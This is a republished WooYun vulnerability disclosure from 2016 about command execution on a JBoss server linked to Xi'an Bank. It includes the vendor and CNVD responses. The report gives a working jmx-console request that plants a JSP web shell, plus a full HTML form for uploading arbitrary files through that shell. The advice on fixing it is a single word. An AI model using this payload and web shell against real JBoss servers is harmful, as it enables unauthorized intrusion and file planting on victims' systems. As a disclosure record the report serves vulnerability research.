西安银行某系统命令执行已Getshell

admin
admin
admin
139475
文章
114
评论
2017年4月26日15:11:40评论333 views字数 226阅读0分45秒阅读模式
摘要

2016-03-05: 细节已通知厂商并且等待厂商处理中
2016-03-09: 厂商已经确认,细节仅向厂商公开
2016-03-19: 细节向核心白帽子及相关领域专家公开
2016-03-29: 细节向普通白帽子公开
2016-04-08: 细节向实习白帽子公开
2016-04-23: 细节向公众公开

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2016-180990

漏洞标题: 西安银行某系统命令执行已Getshell

相关厂商: 西安银行

漏洞作者: zdx

提交时间: 2016-03-05 00:10

公开时间: 2016-04-23 13:50

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 补丁不及时

2人收藏

漏洞详情

披露状态:

2016-03-05: 细节已通知厂商并且等待厂商处理中
2016-03-09: 厂商已经确认,细节仅向厂商公开
2016-03-19: 细节向核心白帽子及相关领域专家公开
2016-03-29: 细节向普通白帽子公开
2016-04-08: 细节向实习白帽子公开
2016-04-23: 细节向公众公开

简要描述:

西安银行

详细说明:

网站 https://**.**.**.**

直接打开https://**.**.**.**/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25+if(request.getParameter(%22f%22)!%3dnull)(new+**.**.**.**.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3E&argType=boolean&arg4=True

以上访问会生成一个这样的路径文件“/upload5warn/shell.jsp”

再通过以下html可进行文件上传:

code 区域

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8">

<title>jsp-test</title>

</head>

<style>

.main{width:980px;height:600px;margin:0 auto;}

.url{width:300px;}

.fn{width:60px;}

.content{width:80%;height:60%;}

</style>

<script>

function upload(){

var url = document.getElementById('url').value,

content = document.getElementById('content').value,

fileName = document.getElementById('fn').value,

form = document.getElementById('fm');

if(url.length == 0){

alert("Url not allowd empty!");

return ;

}

if(content.length == 0){

alert("Content not allowd empty!");

return ;

}

if(fileName.length == 0){

alert("FileName not allowd empty!");

return ;

}

form.action = url;

form.submit();

}

</script>

<body>

<div class="main">

<form id="fm" method="post">

URL:<input type="text" value="http://url/upload5warn/shell.jsp" class="url" id="url" />

FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />

<a href="javascript:upload();">Upload</a><br/>

<textarea id="content" class="content" name="t" ></textarea>

</form>

</div>

</body>

</html>

西安银行某系统命令执行已Getshell

西安银行某系统命令执行已Getshell

漏洞证明:

西安银行某系统命令执行已Getshell

西安银行某系统命令执行已Getshell

修复方案:

修复吧

版权声明:转载请注明来源 zdx@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-03-09 13:50

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,并抄报陕西分中心协助处置,由其后续协调网站管理单位处置。

最新状态:

2016-03-09:该网站非西安银行网站,发现漏洞后,我们第一时间启动应急响应机制定位问题站点,并提醒相关方完成了整改,感谢您对西安银行的关注!

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin